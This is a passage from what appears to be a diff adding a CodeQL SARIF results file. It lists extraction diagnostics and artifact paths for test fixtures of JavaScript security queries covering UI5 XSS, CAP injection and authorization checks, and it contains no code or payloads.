"artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 372 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 373 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 374 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-js-view/webapp/view/app.view.js", + "uriBaseId" : "%SRCROOT%", + "index" : 375 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 376 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 377 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 378 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 379 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 380 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 381 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/view/app.view.json", + "uriBaseId" : "%SRCROOT%", + "index" : 382 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 383 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 384 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 385 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-json-view/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 386 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/renderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 387 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 388 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 389 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 390 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 391 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 392 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 393 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 394 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 395 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xss.js", + "uriBaseId" : "%SRCROOT%", + "index" : 396 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 397 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/control/xssRenderer.js", + "uriBaseId" : "%SRCROOT%", + "index" : 398 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 399 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 400 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 401 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 402 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-separate-renderer-byname/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 403 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package-lock.json", + "uriBaseId" : "%SRCROOT%", + "index" : 404 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 405 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/ui5.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 406 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/controller/app.controller.js", + "uriBaseId" : "%SRCROOT%", + "index" : 407 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.html", + "uriBaseId" : "%SRCROOT%", + "index" : 408 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/index.js", + "uriBaseId" : "%SRCROOT%", + "index" : 409 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/manifest.json", + "uriBaseId" : "%SRCROOT%", + "index" : 410 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/xss-webc-control/webapp/view/app.view.xml", + "uriBaseId" : "%SRCROOT%", + "index" : 411 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 412 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "javascript/heuristic-models/tests/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 413 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "qlt.conf.json", + "uriBaseId" : "%SRCROOT%", + "index" : 414 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "scripts/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 415 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + }, { + "locations" : [ { + "physicalLocation" : { + "artifactLocation" : { + "uri" : "scripts/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 416 + } + } + } ], + "message" : { + "text" : "" + }, + "level" : "none", + "descriptor" : { + "id" : "js/diagnostics/successfully-extracted-files", + "index" : 1, + "toolComponent" : { + "index" : 3 + } + }, + "properties" : { + "formattedMessage" : { + "text" : "" + } + } + } ], + "executionSuccessful" : true + } ], + "artifacts" : [ { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5Xss/avoid-duplicate-alerts/XssTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 0 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/cqlinjection/cqlinjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 1 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/loginjection/log-injection-single-file/loginjection.js", + "uriBaseId" : "%SRCROOT%", + "index" : 2 + } + }, { + "location" : { + "uri" : "javascript/frameworks/ui5/test/queries/UI5LogInjection/avoid-duplicate-alerts/LogInjectionTest.js", + "uriBaseId" : "%SRCROOT%", + "index" : 3 + } + }, { + "location" : { + "uri" : "javascript/heuristic-models/tests/Sources/test.js", + "uriBaseId" : "%SRCROOT%", + "index" : 4 + } + }, { + "location" : { + "uri" : ".github/actions/install-codeql/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 5 + } + }, { + "location" : { + "uri" : ".github/actions/install-qlt/action.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 6 + } + }, { + "location" : { + "uri" : ".github/codeql/codeql-config.yaml", + "uriBaseId" : "%SRCROOT%", + "index" : 7 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 8 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/cap/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 9 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 10 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 11 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/frameworks/ui5/ext/ext/ui5.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 12 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/additional-sources.model.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 13 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 14 + } + }, { + "location" : { + "uri" : ".github/codeql/extensions/javascript/heuristic-models/ext/ext/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 15 + } + }, { + "location" : { + "uri" : ".github/workflows/code_scanning.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 16 + } + }, { + "location" : { + "uri" : ".github/workflows/run-codeql-unit-tests-javascript.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 17 + } + }, { + "location" : { + "uri" : "codeql-workspace.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 18 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/lib/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 19 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/lib/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 20 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/src/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 21 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/src/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 22 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/codeql-pack.lock.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 23 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/qlpack.yml", + "uriBaseId" : "%SRCROOT%", + "index" : 24 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 25 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 26 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 27 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 28 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 29 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 30 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-cds-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 31 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 32 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 33 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 34 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 35 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 36 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 37 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-js-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 38 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/package.json", + "uriBaseId" : "%SRCROOT%", + "index" : 39 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/db/schema.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 40 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/server.js", + "uriBaseId" : "%SRCROOT%", + "index" : 41 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 42 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service1.js", + "uriBaseId" : "%SRCROOT%", + "index" : 43 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.cds.json", + "uriBaseId" : "%SRCROOT%", + "index" : 44 + } + }, { + "location" : { + "uri" : "javascript/frameworks/cap/test/queries/bad-authn-authz/entities-with-no-authz/entities-exposed-with-no-authz/srv/service2.js", + "uriBaseId" : "%SRCROOT%", + "index" : 45 + } + }, { + "location" : { + "uri" : 